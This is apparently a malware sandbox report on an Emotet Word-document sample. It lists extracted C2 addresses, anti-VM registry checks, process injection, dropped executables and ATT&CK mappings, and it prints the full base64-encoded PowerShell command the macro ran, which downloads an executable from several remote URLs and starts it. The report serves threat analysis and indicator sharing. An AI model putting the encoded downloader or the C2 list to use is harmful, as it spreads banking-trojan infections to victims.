012987f43b78cbbd7648fd8fbd4660423486e120f0a42cb155b0169a1f928e45

General

Target

Docs_129a4380ebaff7cfc82bfe05e7d282ff.7
Sample

191016-zkqelymjlx
SHA256

012987f43b78cbbd7648fd8fbd4660423486e120f0a42cb155b0169a1f928e45

Score

N/A

Malware Config

Extracted

Family

emotet

C2

181.59.253.20:21

14.160.93.230:80

74.208.68.48:8080

104.131.58.132:8080

68.183.190.199:8080

62.75.143.100:7080

159.203.204.126:8080

151.80.142.33:80

123.168.4.66:22

46.28.111.142:7080

46.101.212.195:8080

183.82.97.25:80

190.10.194.42:8080

217.199.160.224:8080

186.1.41.111:443

185.86.148.222:8080

185.187.198.10:8080

200.57.102.71:8443

114.79.134.129:443

80.85.87.122:8080

rsa_pubkey.plain

Signatures

Suspicious behavior: AddClipboardFormatListener
Suspicious use of SetWindowsHookEx

Drops Office document 4 IoCs

Processes:

WINWORD.EXE

at	description	ioc	process
21735	File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm	WINWORD.EXE
22110	File created	C:\Users\Admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm	WINWORD.EXE
28938	File opened for modification	C:\Users\Admin\AppData\Local\Temp\Docs_129a4380ebaff7cfc82bfe05e7d282ff.7.doc	WINWORD.EXE
31813	File created	C:\Users\Admin\AppData\Local\Temp\~$cs_129a4380ebaff7cfc82bfe05e7d282ff.7.doc	WINWORD.EXE

Checks system information in the registry (likely anti-VM) 2 TTPs 2 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

at	description	ioc	process
28719	Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer	WINWORD.EXE
28719	Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName	WINWORD.EXE

Enumerates system info in registry 2 TTPs 5 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

at	description	ioc	process
28719	Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
28719	Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
28735	Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
28735	Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
28735	Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE

Checks processor information in registry (likely anti-VM) 2 TTPs 2 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

at	description	ioc	process
28719	Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
28719	Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE

Suspicious use of WriteProcessMemory 7 IoCs

Processes:

SppExtComObj.exepowershell.exe506.exetabletmspterm.exetabletmspterm.exezxrdBYgCDgZj.exetabletmspterm.exe

at	description	process	target process
31813	PID 2760 wrote to memory of 3652	SppExtComObj.exe	SLUI.exe
51313	PID 3316 wrote to memory of 3360	powershell.exe	506.exe
51641	PID 3360 wrote to memory of 788	506.exe	506.exe
61641	PID 1960 wrote to memory of 1352	tabletmspterm.exe	tabletmspterm.exe
107766	PID 1352 wrote to memory of 1868	tabletmspterm.exe	zxrdBYgCDgZj.exe
107922	PID 1868 wrote to memory of 2944	zxrdBYgCDgZj.exe	zxrdBYgCDgZj.exe
115750	PID 2464 wrote to memory of 3180	tabletmspterm.exe	tabletmspterm.exe

Suspicious use of FindShellTrayWindow
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

at description process

40625 Token: SeDebugPrivilege powershell.exe
Suspicious behavior: EnumeratesProcesses
Executes dropped EXE
Emotet Sync 1 IoCs
trojan banker

Processes:

506.exe

description ioc process

Event created Global\E145925EC 506.exe
Suspicious behavior: EmotetMutantsSpam

at	description	process
40625	Token: SeDebugPrivilege	powershell.exe

description	ioc	process
Event created	Global\E145925EC	506.exe

Drops file in system dir 9 IoCs

Processes:

506.exetabletmspterm.exezxrdBYgCDgZj.exetabletmspterm.exe

at	description	ioc	process
59094	File renamed	C:\Users\Admin\506.exe => C:\Windows\SysWOW64\tabletmspterm.exe	506.exe
78016	File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat	tabletmspterm.exe
81563	File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5	tabletmspterm.exe
81563	File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE	tabletmspterm.exe
81563	File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies	tabletmspterm.exe
81563	File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5	tabletmspterm.exe
107735	File created	C:\Windows\SysWOW64\zxrdBYgCDgZj.exe	tabletmspterm.exe
115688	File renamed	C:\Windows\SysWOW64\zxrdBYgCDgZj.exe => C:\Windows\SysWOW64\tabletmspterm.exe	zxrdBYgCDgZj.exe
133922	File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat	tabletmspterm.exe

Loads dropped DLL
Drops desktop.ini 1 IoCs

Processes:

zxrdBYgCDgZj.exe

at description ioc process

115688 File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini zxrdBYgCDgZj.exe
emotet family
family

at	description	ioc	process
115688	File opened for modification	C:\$RECYCLE.BIN\S-1-5-18\desktop.ini	zxrdBYgCDgZj.exe

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Docs_129a4380ebaff7cfc82bfe05e7d282ff.7.doc" /o ""
1⤵
- Drops Office document
- Checks system information in the registry (likely anti-VM)
- Enumerates system info in registry
- Checks processor information in registry (likely anti-VM)
PID:2828

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
- Suspicious use of WriteProcessMemory
PID:2760

C:\Windows\System32\SLUI.exe
"C:\Windows\System32\SLUI.exe" RuleId=eeba1977-569e-4571-b639-7623d8bfecc0;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2de67392-b7a7-462a-b1ca-108dd189f588;NotificationInterval=1440;Trigger=TimerEvent
1⤵
PID:3652

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABPAEQARABCAEEARwBRAEEANABBADEAQQBBAD0AJwBBAHcAQQBCAEMAeABBAEcARwBBACcAOwAkAEIAQQBBAFgAVQBfAHgAdwAxACAAPQAgACcANQAwADYAJwA7ACQAVwBBADQAQQBBAEEAQwBCAEQAXwBCAFEAPQAnAFUAawBBAEQAMQB3AGMAXwAnADsAJABVAEQAVQBjAF8AQQBBADEAQQBfAEEAMQA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAQgBBAEEAWABVAF8AeAB3ADEAKwAnAC4AZQB4AGUAJwA7ACQAVABDAEEAWgBBAEcAVQBBAD0AJwBKAEMAXwBBAEEAVQB4AEIAQQBRAEIAUQAnADsAJABSAHgAVQBBAEEANABVAHcAUQBBAEEAQQB3AD0ALgAoACcAbgBlACcAKwAnAHcALQBvAGIAJwArACcAagBlAGMAdAAnACkAIABOAEUAdAAuAFcARQBiAEMAbABJAEUATgBUADsAJABDAEEAWgAxAFUANABBAEIARwBfAEEAQQBBAD0AJwBoAHQAdABwAHMAOgAvAC8AeQBvAHUAcgBnAHAAcwBoAGUAbABwAGUAcgAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AdgBoADYAMgAyADgANAAwADAALwAqAGgAdAB0AHAAcwA6AC8ALwBrAHkAbwBrAHUAcwBoAGkAbgBtAGkAZABkAGwAZQBlAGEAcwB0AC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AZAA0AGgAbwBiAHMAOAA4ADkALwAqAGgAdAB0AHAAcwA6AC8ALwB0AGEAbQBhAGsAbwBzAGgAaQBzAGEAbgBjAGgAYQByAC4AYwBvAG0ALwBoAHQAaAB6ADkAMQAvAGsANgBpAGwAeQBjAHgAMwA1ADMALwAqAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBiAGUAcgBnAGEAbQBhAGUAZwBlAHMAbwBuAGQAYQBqAC4AYwBvAG0ALwAxAHQAMgAwADEAMQAxAHkANgAzAC8AaQBjADUANQAwADEALwAqAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAG8AcgBnAGEAbgBpAHoAZQByAHMAbwBuAGQAZQBtAGEAbgBkAC4AYwBvAG0ALwBjAGcAaQAtAGIAaQBuAC8ANgB2AHQAZAA3ADMAMAA0AC8AJwAuACIAcwBwAEwAYABpAFQAIgAoACcAKgAnACkAOwAkAEcAUQBDAEQAWAB3AFEAVQBCAFEAQQBCAGsAPQAnAFMAQQBBAEIAQQBHAG8ARwBaAEEAJwA7AGYAbwByAGUAYQBjAGgAKAAkAFkAeAB4ADEAXwBCAEEAdwBBAEEAQQAgAGkAbgAgACQAQwBBAFoAMQBVADQAQQBCAEcAXwBBAEEAQQApAHsAdAByAHkAewAkAFIAeABVAEEAQQA0AFUAdwBRAEEAQQBBAHcALgAiAEQAYABvAFcATgBsAGAATwBhAGQARgBpAGAATABFACIAKAAkAFkAeAB4ADEAXwBCAEEAdwBBAEEAQQAsACAAJABVAEQAVQBjAF8AQQBBADEAQQBfAEEAMQApADsAJABLAEIAQQBaAEMAUQBjAEEAbwA9ACcATgBjAGMAYwBEAEEAQwBBACcAOwBJAGYAIAAoACgAJgAoACcARwBlAHQALQBJACcAKwAnAHQAZQAnACsAJwBtACcAKQAgACQAVQBEAFUAYwBfAEEAQQAxAEEAXwBBADEAKQAuACIAbABgAEUAbgBnAGAAVABIACIAIAAtAGcAZQAgADIANQAzADYANgApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAGAAVABhAFIAdAAiACgAJABVAEQAVQBjAF8AQQBBADEAQQBfAEEAMQApADsAJABZAFUAQQB3AFUAMQBEAG8APQAnAEgAeABVAEIAQQBBAEQAQQBBACcAOwBiAHIAZQBhAGsAOwAkAFoAeAAxAEIAQQBVAFEAQQBCAGsAQQA9ACcAWABBAEEAVQBBAFUAbwBjADEAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAWgA0AFUAMQBvAEIAVQBrAFUAPQAnAFIAXwBBAGMANAA0AEEAbwBEAEcARABrAEcAJwA=
1⤵
- Suspicious use of WriteProcessMemory
- Suspicious use of AdjustPrivilegeToken
PID:3316

C:\Users\Admin\506.exe
"C:\Users\Admin\506.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3360

C:\Users\Admin\506.exe
--dec73219
1⤵
- Emotet Sync
- Drops file in system dir
PID:788

C:\Windows\SysWOW64\tabletmspterm.exe
"C:\Windows\SysWOW64\tabletmspterm.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1960

C:\Windows\SysWOW64\tabletmspterm.exe
--356fff06
1⤵
- Suspicious use of WriteProcessMemory
- Drops file in system dir
PID:1352

C:\Windows\SysWOW64\zxrdBYgCDgZj.exe
"C:\Windows\SysWOW64\zxrdBYgCDgZj.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1868

C:\Windows\SysWOW64\zxrdBYgCDgZj.exe
--bf460be8
1⤵
- Drops file in system dir
- Drops desktop.ini
PID:2944

C:\Windows\SysWOW64\tabletmspterm.exe
"C:\Windows\SysWOW64\tabletmspterm.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2464

C:\Windows\SysWOW64\tabletmspterm.exe
--356fff06
1⤵
- Drops file in system dir
PID:3180

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

3

T1012

System Information Discovery

3

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\506.exe

Download Submit
C:\Users\Admin\506.exe

Download Submit
C:\Users\Admin\506.exe

Download Submit
C:\Windows\SysWOW64\tabletmspterm.exe

Download Submit
C:\Windows\SysWOW64\tabletmspterm.exe

Download Submit
C:\Windows\SysWOW64\tabletmspterm.exe

Download Submit
C:\Windows\SysWOW64\tabletmspterm.exe

Download Submit
C:\Windows\SysWOW64\zxrdBYgCDgZj.exe

Download Submit
C:\Windows\SysWOW64\zxrdBYgCDgZj.exe

Download Submit
C:\Windows\SysWOW64\zxrdBYgCDgZj.exe

Download Submit
\Windows\SysWOW64\zxrdBYgCDgZj.exe

Download Submit
\Windows\SysWOW64\zxrdBYgCDgZj.exe

Download Submit
\Windows\SysWOW64\zxrdBYgCDgZj.exe

Download Submit
\Windows\SysWOW64\zxrdBYgCDgZj.exe

Download Submit
memory/788-9-0x0000000000400000-0x000000000049F000-memory.dmp

Filesize
636KB

Download
memory/788-8-0x00000000004E0000-0x00000000004F7000-memory.dmp

Filesize
92KB

Download
memory/1352-14-0x0000000000400000-0x000000000049F000-memory.dmp

Filesize
636KB

Download
memory/1352-13-0x00000000007A0000-0x00000000007B7000-memory.dmp

Filesize
92KB

Download
memory/1868-19-0x00000000005B0000-0x00000000005C7000-memory.dmp

Filesize
92KB

Download
memory/1960-11-0x0000000000DE0000-0x0000000000DF7000-memory.dmp

Filesize
92KB

Download
memory/2464-26-0x00000000004B0000-0x00000000004C7000-memory.dmp

Filesize
92KB

Download
memory/2944-23-0x00000000005A0000-0x00000000005B7000-memory.dmp

Filesize
92KB

Download
memory/2944-24-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/3180-29-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/3360-6-0x0000000002240000-0x0000000002257000-memory.dmp

Filesize
92KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads